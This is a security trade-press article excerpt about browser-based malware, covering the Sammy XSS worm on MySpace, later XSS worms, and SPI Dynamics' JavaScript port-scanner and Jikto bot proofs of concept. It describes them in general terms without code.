|
Browser Malware
While botnets have become potent weapons for cyberattackers, online thieves are also turning their focus to the Web browser. The browser is becoming the primary application used to access data at home and at work, making it an attractive target. After all, why bother compromising the underlying operating system if the most sensitive transactions--from online banking to corporate sales management--occur in the browser? The browser includes powerful functionality to support the advanced requirements of modern Web-based applications; these features create an ecosystem for malicious code to survive without directly interacting with the operating system.
October 2005 brought the first high-profile worm that was purely Web-based. The Sammy worm took advantage of a cross-site scripting (XSS) flaw in the MySpace Web site and employed a popular JavaScript construct used in many AJAX applications. Such worms embed their code in pages of the compromised Web site and typically spread when the site's users view the infected page. The payload of such worms varies, but could range from defacing the infected pages to executing financial transactions within the context of the victim's session.
The Sammy worm infected more than a million MySpace users. On its heels came other worms powered by XSS and AJAX techniques. The list includes MySpace worms that propagated with the help of Flash and QuickTime browser plug-ins, as well as worms that spread on Orkut, Gaia Online and Yahoo! Mail Web sites.
Another ex...
To continue reading for free, register below or login
To read more you must become a member of SearchSecurity.com
ample of the power of browser-based malware is the proof-of-concept port-scanning tool written in JavaScript by security vendor SPI Dynamics to demonstrate some of the challenges of securing intranets. Running in the victim's browser, the scanner can perform reconnaissance against the victim's network even if it is behind a firewall. This tool illustrates the extent to which the malicious Web site can explore the internal network of the site's visitor, even when operating purely in the browser.
SPI Dynamics further demonstrated the capabilities of browser malware by exhibiting a JavaScript bot at the ShmooCon conference in March without making its code public. Called Jikto, the proof-of-concept bot can locate vulnerabilities in Web applications while running within a Web browser. An attacker could inject Jikto in the victim's browser by exploiting XSS and other Web site vulnerabilities. The attacker could control Jikto instances remotely, capturing the information they collect and instructing them to launch further Web-based attacks.
Clearly, today's threat environment is multifaceted and rapidly changing. From zero-day exploits, client-side attacks and botnets, organizations are facing a maturing marketplace that encourages attackers to invest in better organization and tools. In turn, defenders need to keep learning from each other, sharing threat information and discussing effective defense strategies. This is the only way to ensure they do not fall behind in the cyberspace arms race that is unlikely to end any time soon.
|
 |
|
